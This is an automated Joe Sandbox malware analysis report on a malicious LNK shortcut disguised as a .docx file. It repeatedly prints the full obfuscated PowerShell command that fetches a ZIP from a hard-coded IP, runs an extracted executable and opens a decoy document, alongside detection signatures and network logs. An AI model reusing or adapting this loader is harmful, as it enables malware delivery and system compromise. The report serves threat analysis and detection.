Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zvernennya.docx.lnk

Overview

General Information

Sample name:Zvernennya.docx.lnk
Analysis ID:1665079
MD5:88d8bac9ebead23483eedb46bff67a83
SHA1:2935064aad64a6940805d1118a8e084a3882680b
SHA256:4fd5ac728d23e19fe64b0c873c94b4daee4ad157a5b5036b22b04cd456ef970f
Tags:lnkUKRuser-smica83
Infos:

Detection

Score:76
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64U

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-15T08:09:19.519887+020028032742Potentially Bad Traffic192.168.2.549692146.185.239.1080TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-15T08:09:18.316758+020018100002Potentially Bad Traffic192.168.2.549692146.185.239.1080TCP
2025-04-15T08:09:19.519887+020018100002Potentially Bad Traffic192.168.2.549692146.185.239.1080TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Zvernennya.docx.lnkReversingLabs: Detection: 18%
Source: Zvernennya.docx.lnkVirustotal: Detection: 44%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleNeural Call Log Analysis: 91.8%
Source: Binary string: mscorlib.pdbpdblib.pdbE7 source: powershell.exe, 00000000.00000002.1457229741.000001DDB6790000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 00000000.00000002.1457419721.000001DDB6828000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdbD source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 00000000.00000002.1457084160.000001DDB677F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbh source: powershell.exe, 00000000.00000002.1457419721.000001DDB67FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\System.Core.pdb source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000000.00000002.1458219872.000001DDB6A4E000.00000004.00000020.00020000.00000000.sdmp
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49692 -> 146.185.239.10:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49692 -> 146.185.239.10:80
Source: global trafficHTTP traffic detected: GET /avast.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 146.185.239.10Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /burka/Zvernennya.docx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownTCP traffic detected without corresponding DNS query: 146.185.239.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /avast.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 146.185.239.10Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /burka/Zvernennya.docx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 146.185.239.10
Source: global trafficDNS traffic detected: DNS query: c.pki.goog
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Apr 2025 06:09:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 279Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 36 2e 31 38 35 2e 32 33 39 2e 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 146.185.239.10 Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Apr 2025 06:09:19 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 279Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 36 2e 31 38 35 2e 32 33 39 2e 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 146.185.239.10 Port 80</address></body></html>
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9E66A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.185.239.10
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E66A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.185.239.10/avast.zip
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.185.239.10/burka/Zvernennya.docx
Source: powershell.exe, 00000000.00000002.1453912574.000001DDB630C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9DF71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9DF71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9FC9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9FEF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micro/fwlink/?LinkId=
Source: powershell.exe, 00000000.00000002.1452760323.000001DDB60C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Zvernennya.docx.lnkLNK file: -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BEBFE90_2_00007FF7C7BEBFE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE8F700_2_00007FF7C7BE8F70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE55FA0_2_00007FF7C7BE55FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE8D000_2_00007FF7C7BE8D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BF6BFB0_2_00007FF7C7BF6BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BF03FA0_2_00007FF7C7BF03FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE9B480_2_00007FF7C7BE9B48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BEB1F80_2_00007FF7C7BEB1F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C7BE89380_2_00007FF7C7BE8938
Source: classification engineClassification label: mal76.evad.winLNK@2/29@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdqb2blo.oea.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Zvernennya.docx.lnkReversingLabs: Detection: 18%
Source: Zvernennya.docx.lnkVirustotal: Detection: 44%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
